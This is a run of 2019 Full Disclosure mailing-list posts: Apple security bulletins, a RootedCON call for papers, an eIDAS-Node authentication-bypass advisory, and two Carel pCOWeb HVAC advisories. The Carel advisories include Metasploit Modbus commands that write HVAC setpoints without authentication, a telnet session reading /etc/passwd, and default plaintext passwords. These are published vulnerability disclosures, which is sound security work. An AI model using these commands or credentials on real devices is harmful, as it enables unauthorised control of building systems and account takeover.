and included in macOS Catalina 10.15.1 Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2019-8815: Apple Additional recognition WebKit We would like to acknowledge Dlive of Tencent's Xuanwu Lab and Zhiyi Zhang of Codesafe Team of Legendsec at Qi'anxin Group for their assistance. Installation note: Safari 13.0.3 may be obtained from the Mac App Store. Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -BEGIN PGP SIGNATURE- iQJdBAEBCABHFiEEM5FaaFRjww9EJgvRBz4uGe3y0M0FAl24p5UpHHByb2R1Y3Qt c2VjdXJpdHktbm9yZXBseUBsaXN0cy5hcHBsZS5jb20ACgkQBz4uGe3y0M1LAg// fHUCPO59afw9n4DzZeFXpudIfkl/loz/UHJ8EpOf8KljSq0krbwAgY94o3brfpz1 Q9fZPWIfVJcijR2DdxA9qm2SKvzd5Z7mIpIJ1TBVGpU5Zi9iiqwincK8Q08HVMeP k6/Ue5VV5GTPEdhaDMPTHooMIPiUg/i7NV6PJHcLf6xEGSmOsVOCgmfho9Nt1ZXr eiUXJ7RG/4hmubbUUUNhBXLRy1dPHZYjweP5MJdezQitYSgHC/XBPktqRWqOblLT XLppf+lX3957KoqoM2nxQ+UqF/ohIclYvBw5hgoqm4pTcNscixgoVfb+eyBtR2YB n7Y4D0IBjDcqEiix6QmhqRGGgf8rH/2qCdIEcTIGffYBZngQMUWlc2x/MebiACkW /jVun5wSILGVMd/qa9ol8gsH//lr23/BE4hD0pcD1JK49T4Zp66JzHLShiQ5sqQt 6AT2axARGOeyaLNFVVrJvxaEqeM1nhYvJw37X82qSr+8YGOrznG0sUJdaISbi6bz v/YwV6Ek/6CTOMaTg1Xpgk50icAQm2cNnfBmnM/CEkUqS627Z/Y8RzKU+PFrlhuC 1AIrpyat47AdFUhJ+nbP29qfR8ANu0/GcLJPnC9aYqWftneI+V6hhs/9IvY+QQJS 9sWndqDp8uSKoG84352ubxPZNlBGAYOjwAZ3LvaO4tA= =8wFb -END PGP SIGNATURE- ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] APPLE-SA-2019-10-29-1 iOS 13.2 and iPadOS 13.2
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-2019-10-29-1 iOS 13.2 and iPadOS 13.2 iOS 13.2 and iPadOS 13.2 are now available and address the following: Accounts Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation Impact: A remote attacker may be able to leak memory Description: An out-of-bounds read was addressed with improved input validation. CVE-2019-8787: Steffen Klee of Secure Mobile Networking Lab at Technische Universität Darmstadt App Store Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation Impact: A local attacker may be able to login to the account of a previously logged in user without valid credentials. Description: An authentication issue was addressed with improved state management. CVE-2019-8803: Kiyeon An, 차민규 (CHA Minkyu) Associated Domains Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation Impact: Improper URL processing may lead to data exfiltration Description: An issue existed in the parsing of URLs. This issue was addressed with improved input validation. CVE-2019-8788: Juha Lindstedt of Pakastin, Mirko Tanania, Rauli Rikama of Zero Keyboard Ltd Audio Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation Impact: An application may be able to execute arbitrary code with system privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2019-8785: Ian Beer of Google Project Zero CVE-2019-8797: 08Tc3wBB working with SSD Secure Disclosure AVEVideoEncoder Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation Impact: An application may be able to execute arbitrary code with system privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2019-8795: 08Tc3wBB working with SSD Secure Disclosure Books Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation Impact: Parsing a maliciously crafted iBooks file may lead to disclosure of user information Description: A validation issue existed in the handling of symlinks. This issue was addressed with improved validation of symlinks. CVE-2019-8789: Gertjan Franken of imec-DistriNet, KU Leuven Contacts Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation Impact: Processing a maliciously contact may lead to UI spoofing Description: An inconsistent user interface issue was addressed with improved state management. CVE-2017-7152: Oliver Paukstadt of Thinking Objects GmbH (to.com) File System Events Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation Impact: An application may be able to execute arbitrary code with system privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2019-8798: ABC Research s.r.o. working with Trend Micro's Zero Day Initiative Graphics Driver Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation Impact: An application may be able to execute arbitrary code with system privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2019-8784: Vasiliy Vasilyev and Ilya Finogeev of Webinar, LLC Kernel Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation Impact: An application may be able to read restricted memory Description: A validation issue was addressed with improved input sanitization. CVE-2019-8794: 08Tc3wBB working with SSD Secure Disclosure Kernel Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2019-8786: an anonymous researcher Screen Time Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation Impact: A local user may be able to record the screen without a visible screen recording indicator Description: A consistency issue existed in deciding when to show the screen recording indicator. The issue was resolved with improved state management. CVE-2019-8793: Ryan Jenkins of Lake Forrest Prep School Setup Assistant Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation Impact: An attacker in physical proximity may be able to force a user onto a malicious Wi-Fi network during device setup Description: An inconsistency in Wi-Fi network configuration settings was addressed. CVE-2019-8804: Christy Philip Mathew of Zimperium, Inc WebKit
[FD] APPLE-SA-2019-10-29-7 Additional information for APPLE-SA-2019-9-26-4 Safari 13
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-2019-10-29-7 Additional information for APPLE-SA-2019-9-26-4 Safari 13 Safari 13 addresses the following: WebKit Available for: macOS Mojave 10.14.6 and macOS High Sierra 10.13.6 Impact: Processing maliciously crafted web content may lead to universal cross site scripting Description: A logic issue was addressed with improved state management. CVE-2019-8625: Sergei Glazunov of Google Project Zero CVE-2019-8719: Sergei Glazunov of Google Project Zero Entry added October 29, 2019 WebKit Available for: macOS Mojave 10.14.6 and macOS High Sierra 10.13.6 Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2019-8707: an anonymous researcher working with Trend Micro's Zero Day Initiative, cc working with Trend Micro Zero Day Initiative CVE-2019-8726: Jihui Lu of Tencent KeenLab CVE-2019-8728: Junho Jang of LINE Security Team and Hanul Choi of ABLY Corporation CVE-2019-8733: Sergei Glazunov of Google Project Zero CVE-2019-8734: found by OSS-Fuzz CVE-2019-8735: G. Geshev working with Trend Micro Zero Day Initiative Entry added October 29, 2019 WebKit Page Loading Available for: macOS Mojave 10.14.6 and macOS High Sierra 10.13.6 Impact: Processing maliciously crafted web content may lead to universal cross site scripting Description: A logic issue was addressed with improved state management. CVE-2019-8674: Sergei Glazunov of Google Project Zero Additional recognition WebKit We would like to acknowledge MinJeong Kim of Information Security Lab, Chungnam National University, JaeCheol Ryou of the Information Security Lab, Chungnam National University in South Korea, Yiğit Can YILMAZ (@yilmazcanyigit), Zhihua Yao of DBAPPSecurity Zion Lab, an anonymous researcher, and cc working with Trend Micro's Zero Day Initiative for their assistance. Installation note: Safari 13 may be obtained from the Mac App Store. Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -BEGIN PGP SIGNATURE- iQJdBAEBCABHFiEEM5FaaFRjww9EJgvRBz4uGe3y0M0FAl24p5YpHHByb2R1Y3Qt c2VjdXJpdHktbm9yZXBseUBsaXN0cy5hcHBsZS5jb20ACgkQBz4uGe3y0M00kRAA tOJHN3d53CphHqulCJAI5yuhbbNWq14bv4eEMckxYha3i84y8SZyz2f7K/sN6UKz /04FqhUJFE5ngD4dXN2WsA6w4Ncd/BA3/KLUpE6YIU7RmLLF5VsU40OxNi66BEoW OX/BX3eNEHoAr8x7Lg+XNHPB3brZySG+gthwn0UJsq6hiruqvJhiA4tvO4p+FeIy a1lWWlINPB8fR92Rhp/57aRGpwnaSLJXqjOkuW7rT9sW/RjFtxs2eHXyutmK4wJ0 SoXh4iJr7w+4DyhX5igduy5W/2cKks0+DF6Dp0Zd9cyo8DcD9t8eiTj9sWusfKj8 jwVSw4tiFQCQxns7Ud+EwdGgOMqWzzlcD4WPV80LySJm5ba0mTCS0hJ3aLJV/mvC DN5zJcreFetR3zH21XNIZUDwLrByaIzUafnnAh+z1HHyyMSz6xxoZDiTe0ZIhoCN 7zlIBtj4m1CYKpTHG2xTkHZCJHb3XRCx27rtPvtn0p9S/1hpHdlYkQEZr1yPUAhj qfOdnm3B2Yj0D9AoaYY5Lq4RhxkAU/D6D9tpkj09vBOBN7cFqgscSeCWF2evTOSP BUM/zn7crJJQ2rsFnJqiu5VrQ076Xp42/pYCvvL0dyaqiMq38H3OgEso9tm3ol19 bhdIF9Lt+f6ADw1tM+4wMkExo/JxyARQGc/Hoc43a8s= =PATl -END PGP SIGNATURE- ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] RootedCON 2020 Call For Papers is open!
__ _ _ ___ _ _ / / _ \ ___ ___ | |_ ___ __| |/ ___/ _ \| \ | | / /| |_) / _ \ / _ \| __/ _ \/ _` | | | | | | \| | / / | _ < (_) | (_) | || __/ (_| | |__| |_| | |\ | /_/ |_| \_\___/ \___/ \__\___|\__,_|\\___/|_| \_| *** /RootedCON'2020 - Main event *** -=] About RootedCON RootedCON is a technology congress that will be developed in Madrid (Spain) from 5 - 7 of march 2020. With an estimated seating from 2.500 to 3.000 people, is the most relevant specialized congress that is held in the country, and one of the most relevant in Europe, with attendee profiles ranging from students, Law Enforcenment Agencies to professionals in the technology and information security market and, even, just passionate people. This is our XI edition, *after one tenth anniversary!*. And as in every edition, we want it to make it special :) -=] Talk types We will mostly accept two kind of talks: - Fast talks: 20 minutes. - Standard talks: 50 minutes. There will exist a limited number of talks of both types having, even, the possibility of working with the schedule to extend a talk beyond the 20 minutes limit, or to reduce a 50 minutes one. We encourage you to BE ORIGINAL with your proposals. We accept *rare* talks and thematic, on culture or politics (always orbiting around the concepts technological or Information Security). -=] International speakers There is simultaneous Spanish-English and English-Spanish translation on all tracks, so please do not hesitate to inscribe a talk, wherever you are from :) Be sure to indicate the language in which you will give it: [ES] - Spanish [EN] - English =] Topics we are looking for Any interesting topic related to TECHNOLOGY, having examples below and not limited to: - ANY original topic that contributes content to our audience! - Any hacking topic in any environment: IP, OT, IoT, Cloud, EDGE, Satellites, Mobiles... - Reverse engineering, debugging, hooking, fuzzing, exploiting, DFIR,... - APT, botnets y malware. - Financial Tech (FinTech) - Hardware Hacking, Jtag, SWJ, Dap, consoles,... - Videogames, cheats... - Cryptography, steganography, covert channels,... - DEV/SEC/OPS. - DEV: MQTT, AMQP, development patterns, distributed development, CI/CD... - OPS: puppet, jenkins, orchestration, virtualization and containers, artifacts,... - Culture, philosophy and ethics, future, innovation ... the world! Remember that we have THREE (maybe FOUR) rooms in multitrack: - Cibeles Room (~1000 people) - Lugus Room (~500 people) - Beginners Room (~500 people) - Strategy Room (~500 people) (pending confirmation) -=] Talk submission procedure We will only accept talks submitted throught the official speaker form: https://cfp.rootedcon.com/ (both english and spanish) Any other talk submission will be considered "unofficial" and will not have any guarantee in being selected. -=] Speaker benefits and privileges Every speaker will get these benefits and privileges: - ONE extra ticket for a partner (1 ticket) to attend the event. - Diner with all the speakers, RootedLABS trainees, sponsors and the RootedCON team. - Accommodation (RootedCON carries with the costs, even the partner) - Travelling (RootedCON carries with the speaker's costs) - Full access to all congress areas all the event long. - The possibility of repeating the speech up to three times, one in every track (depending of the final rating). - Some free drinks in the party :) - Potential job offers management. - A gift from the organization. -=] Obligations and duties of the speaker All speakers that inscribed a talk and get selected must: a) Confirm that the talk is TECHNICAL and it is supported with Proof of Concepts (PoC). If PoC are not available, it should be justified. b) Send talk materials in the agreed dates before the congress. Please, include details about the PoCs. c) Accept in an explicit way that all the materials in the talk, as the audio and video will be published, no matter the format and mechanism in RootedCON's content management systems or others. *Please*, make sure you understand your duties as a speaker before submitting a proposal. -=] Sponsors and partners RootedCON is always looking for new quality sponsors. If you have a propposal or feel your organization may be interested, please do contact us in: sponsors-AT-rootedcon.com IMPORTANT: due to the mostly technical essence of the congress and the prefences shown by our attendeess in multiple polls, we recommend to the potential sponsors to work in a talk aligned with the expectation of our public. Any help, comment, idea, proposal or collaboration will be evaluated in deep: it is very important for our Congress to receive this kind of new ideas, as we depend on you to do our best in building the Event. -=] Critical things to consider 1. Time management and talk duration are
[FD] SEC Consult SA-20191029-0 :: Authentication Bypass in eIDAS-Node (European #eGovernment cross-border authentication)
SEC Consult Vulnerability Lab Security Advisory < 20191029-0 > === title: Authentication Bypass product: eIDAS-Node vulnerable version: <=v2.3 (v2.1 vulnerability #2) fixed version: v2.3.1 CVE number: - impact: critical homepage: https://ec.europa.eu/cefdigital/wiki/display/CEFDIGITAL/eIDAS-Node+Integration+Package found: 2019-06 by: Wolfgang Ettlinger (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "The eIDAS-Node software is a sample implementation of the eID eIDAS Profile. It was developed by the European Commission with the help of Member States collaborating in the technical sub-committee of the eIDAS Expert Group. The eIDAS-Node software contains the necessary modules to help Member States to communicate with other eIDAS-compliant counterparts in a centralised or distributed fashion." URL: https://ec.europa.eu/cefdigital/wiki/display/CEFDIGITAL/eIDAS-Node+Integration+Package Business recommendation: During a short crash test SEC Consult identified critical vulnerabilities in the eIDAS-Node software component (EU cross-border authentication). These vulnerabilities could allow an attacker to impersonate any EU citizen. SEC Consult recommends to immediately apply the patch provided by the vendor, if this has not happened yet. Moreover, SEC Consult recommends operators of eIDAS-Node installations to conduct a forensic investigation into whether this vulnerability has already been abused. Vulnerability overview/description: --- The communication between eIDAS Member States (MS) is based on SAML. The eIDAS node of an MS providing a service to citizens of another MS sends a SAML AuthNRequest to an eIDAS node that is capable of authenticating the citizen through her national authentication scheme (e.g. id card authentication). After the citizen has successfully authenticated, a SAML response is sent to the requesting eIDAS node. To verify the authenticity of the SAML response, eIDAS-Node verifies its signature and checks whether the signing certificate is trusted. Vulnerability #1: Certificate Faking The verification of the certificate trust is implemented as follows: 1. The certificate is accepted if it is in the local trust store 2. Otherwise the issuer certificate of the entity certificate is retrieved from either the local trust store or from the supplemental certificates in the SAML response. 3. If a trust path can be established between the issuer certificate and a certificate in the trust store, the entity certificate is accepted. It was found that, in step 2, the application searches for the the issuer certificate by comparing the Issuer DN of the entity certificate to the Subject DN of the potential issuer certificates. The application does not verify whether the entity certificate has been correctly signed by the issuer certificate. Moreover, other checks, such as whether the basic constraints of the issuer certificate allow it to act as a certificate issuer are not verified. An attacker can therefore sign a manipulated SAML response with a forged certificate. The certificate must contain an Issuer DN that matches the subject of a certificate in the trust store. The subject must contain the country of the citizen (e.g. CN=FAKE, C=AT). Vulnerability #2: Missing Certificate Validation At least version 2.1 of the software uses the OpenSAML class ExplicitKeyTrustEvaluator to check whether the signer certificate is trusted. The method validate(...) returns a boolean value indicating whether trust could be established. However, eIDAS-Node does not check the return value and continues processing the SAML response. As effectively, the certificate's trust is not verified, an attacker can sign the SAML response with any certificate. This advisory demonstrates vulnerabilities against the endpoint that processes SAML responses. Other endpoints (e.g. the ones that process SAML requests) are likely affected as well (this has only partly been verified). NOTE: The version 2.1 is no longer supported in favor of the version 2.3.1. Proof of concept: - Vulnerability #1: Certificate Faking The following Java class demonstrates the attack: - snip - package com.sec_consult.eidas_node.autologin; import java.io.InputStream; import java.math.BigInteger; import java.net.URI; import java.security.InvalidKeyException; import java.security.KeyPair; import java.security.KeyPairGenerator; import java.security.PrivateKey; import java.security.PublicKey; import
[FD] [RT-SA-2019-014] Unauthenticated Access to Modbus Interface in Carel pCOWeb HVAC
Advisory: Unauthenticated Access to Modbus Interface in Carel pCOWeb HVAC As part of it's features, the Carel pCOWeb card exposes a Modbus interface to the network. By design, Modbus does not provide authentication, allowing to control the affected system. Details === Product: HVAC units using the OEM Carel pCOWeb Ethernet Control Interface Affected Versions: "A 1.4.11 - B 1.4.2", possibly others Fixed Versions: product obsolete Vulnerability Type: Unauthenticated Access Security Risk: high Vendor URL: https://www.carel.com/product/pcoweb-card Vendor Status: notified / product obsolete Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2019-14 Advisory Status: published CVE: GENERIC-MAP-NOMATCH CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH Introduction "The pCOWeb card is used to interface the pCO Sistema to networks that use the HVAC protocols based on the Ethernet physical standard, such as BACnet IP, Modbus TCP/IP and SNMP. The card also features an integrated Web-Server, which both contains the HTML pages relating to the specific application and allows a browser to be used for remote system management." (from the vendor's homepage) It is used as an OEM module in several different HVAC systems and considered obsolete by the vendor. More Details While authentication is required to access the web interface (compare advisory rt-sa-2019-013 [0]) no authentication is necessary for using the Modbus interface on TCP port 502, since the Modbus protocol did not offer any authentication mechanism during the device's lifetime. The addition of encryption and authentication was only recently proposed by the Modbus Organization [1]. It is believed that this might be analogous to the problem described in CVE-2019-13549 for the special case of Rittal SK 3232 products. Other OEMs are affected, too. Proof of Concept The web interface of the Carel pCOWeb card allows authenticated users to read and write many variables of the system via the URL http://192.168.0.1/config/adminpage.html This web page seems to provide access to all Modbus variables using large tables of variables 1-207 for digital, analog and integer variables, respectively. By accessing TCP port 502 (Modbus to TCP), it is possible to access these variables without authentication. This can be done, for example, by using the Metasploit [2] modbusclient [3] module: msf5 > use auxiliary/scanner/scada/modbusclient msf5 auxiliary(scanner/scada/modbusclient) > set RHOSTS 192.168.0.1 RHOSTS => 192.168.0.1 msf5 auxiliary(scanner/scada/modbusclient) > set DATA_ADDRESS 10 DATA_ADDRESS => 10 msf5 auxiliary(scanner/scada/modbusclient) > run [*] 192.168.0.1:502 - Sending READ REGISTERS... [+] 192.168.0.1:502 - 1 register values from address 10 : [+] 192.168.0.1:502 - [240] [*] Auxiliary module execution completed The returned value matches the set temperature of 24°C multiplied by ten, as the variable can only hold integers. Using the same module, it is possible to change the temperature setpoint, too: msf5 auxiliary(scanner/scada/modbusclient) > set ACTION WRITE_REGISTER ACTION => WRITE_REGISTER msf5 auxiliary(scanner/scada/modbusclient) > set DATA 241 DATA => 241 msf5 auxiliary(scanner/scada/modbusclient) > run [*] 192.168.0.1:502 - Sending WRITE REGISTER... [+] 192.168.0.1:502 - Value 241 successfully written at registry address 10 [*] Auxiliary module execution completed This allows unauthenticated remote attackers to reconfigure the device. Depending on OEM integration, different variables might represent different settings. Additionally, the system provides SNMP (UDP Port 161) write access with the SNMP community string "public" or "carel" (depending on version) as documented in the manual [4] and BACnet over IP (UDP Port 47808). Workaround == The Carel pCOWeb card should not be connected to networks accessible by untrusted users. Fix === No updated firmware will be published for pCOWeb Cards, as they are obsolete since Dec 2017. A successor hardware with current firmware is available for OEM integrators. Security Risk = Since the Modbus protocol implemented in the Carel pCOWeb card does not offer auhtentication, it is not possible to limit access to the system to authorized users, allowing attackers to control the system if the device is accessible via the network. This is considered to pose a high risk in context of the Carel pCOWeb card. Timeline 2019-07-17 Vulnerability identified 2019-08-03 Customer approved disclosure to vendor 2019-09-02 Vendor notified 2019-09-09 Vendor did not respond as promised 2019-09-17 Vendor
[FD] [RT-SA-2019-013] Unsafe Storage of Credentials in Carel pCOWeb HVAC
Advisory: Unsafe Storage of Credentials in Carel pCOWeb HVAC The Carel pCOWeb card stores password hashes in the file "/etc/passwd", allowing privilege escalation by authenticated users. Additionally, plaintext copies of the passwords are stored. Details === Product: HVAC units using the OEM Carel pCOWeb Ethernet Control Interface Affected Versions: "A 1.4.11 - B 1.4.2", possibly others Fixed Versions: product obsolete Vulnerability Type: Credential Disclosure / Privilege Escalation Security Risk: low Vendor URL: https://www.carel.com/product/pcoweb-card Vendor Status: notified / product obsolete Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2019-13 Advisory Status: published CVE: GENERIC-MAP-NOMATCH CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH Introduction "The pCOWeb card is used to interface the pCO Sistema to networks that use the HVAC protocols based on the Ethernet physical standard, such as BACnet IP, Modbus TCP/IP and SNMP. The card also features an integrated Web-Server, which both contains the HTML pages relating to the specific application and allows a browser to be used for remote system management." (from the vendor's homepage) It is used as an OEM module in several different HVAC systems and considered obsolete by the vendor. More Details The Carel pCOWeb interface provides user accounts with different levels of privileges. Despite the different privileges, other users, even the user nobody, are able to read the file "/etc/passwd" which contains the hashed passwords for all user accounts, especially those with more privileges. Additionally, a plaintext copy of all passwords is stored in the file /usr/local/root/flash/etc/sysconfig/userspwd, which is accessible from the web interface at the URL http://192.168.0.1/config/pw_changeusers.html This allows attackers with knowledge of one user account password to gain knowledge of the other accounts passwords, possibly gaining more privileges. Proof of Concept Apart from a web interface, the Carel pCOWeb card provides a telnet interface accessible using a variety of default passwords and, in some cases, the user "nobody" without password: $ telnet 192.168.0.1 Trying 192.168.0.1... Connected to 192.168.0.1. Escape character is '^]'. Linux 2.4.21-rmk1 (pCOWeb) (ttya0) pCOWeb login: nobody No directory /var/lib/nobody! Logging in with home = "/". Executing profile /usr/local/bin:/bin:/usr/bin [nobody@pCOWeb13:58:55 /]$ ls -la /etc/passwd -rw-r--r-- 1 root root 317 Jan 1 00:00 /etc/passwd [nobody@pCOWeb13:59:00 /]$ cat /etc/passwd root:o4jAwxNRjdSSk:0:0:root:/root:/bin/bash http::48:48:HTTP users:/usr/http/root:/bin/bash nobody::99:99:nobody:/var/lib/nobody:/bin/bash httpadmin:p4erNF6yyLx0U:200:200:httpadmin:/usr/local/root/http:/bin/bash carel:f4msfA.Ljf2Fo:500:500:carel:/home:/bin/bash guest:d4iIyYc5JrnxM:502:101:guest:/usr/bin:/bin/bash [nobody@pCOWeb13:59:32 /]$ cat /usr/local/root/admin/.htpasswd admin:7c3fxxrcHcwtc [nobody@pCOWeb13:59:33 /]$ The following table lists the cleartext passwords for above password hashes: username | password -- root | froot httpadmin | fhttpadm carel | fcarel guest | fguest nobody | (none) admin | fadmin The passwords for the useraccounts "root", "httpadmin", "carel" and "guest" are documented in section 9.7.2 of the user manual [0], warning users: "it is important to set a password other than the default "froot" to prevent potentially dangerous outside access." It is possible that these default credentials are covered in CVE-2019-13553. Depending on firmware version and/or OEM modifications, some versions additionally allow Telnet login without password with the username "nobody" while it is disabled for other versions. The password for the web interface user "admin" is documented in section 9.2.1 of the user manual [0]. Additionally, some versions were seen with additional user credentials stored in the directory provided for OEM modifications of the web interface, such as the username "reserved" with the password "freserve" in "/usr/local/root/flash/http/reserved/.htpasswd". Storing some of these passwords in plaintext is covered in CVE-2019-11369. However, while the above passwords are stored in hashed form, the web interface at http://192.168.0.1/config/pw_changeusers.html shows them in plaintext. A file containing the plaintext passwords can be found in the filesystem: [root@pCOWeb14:02:14 /]# cat /usr/local/root/flash/etc/sysconfig/userspwd PROOT=froot PHTTP=fhttpadmin PGUEST=fguest PCAREL=fcarel Workaround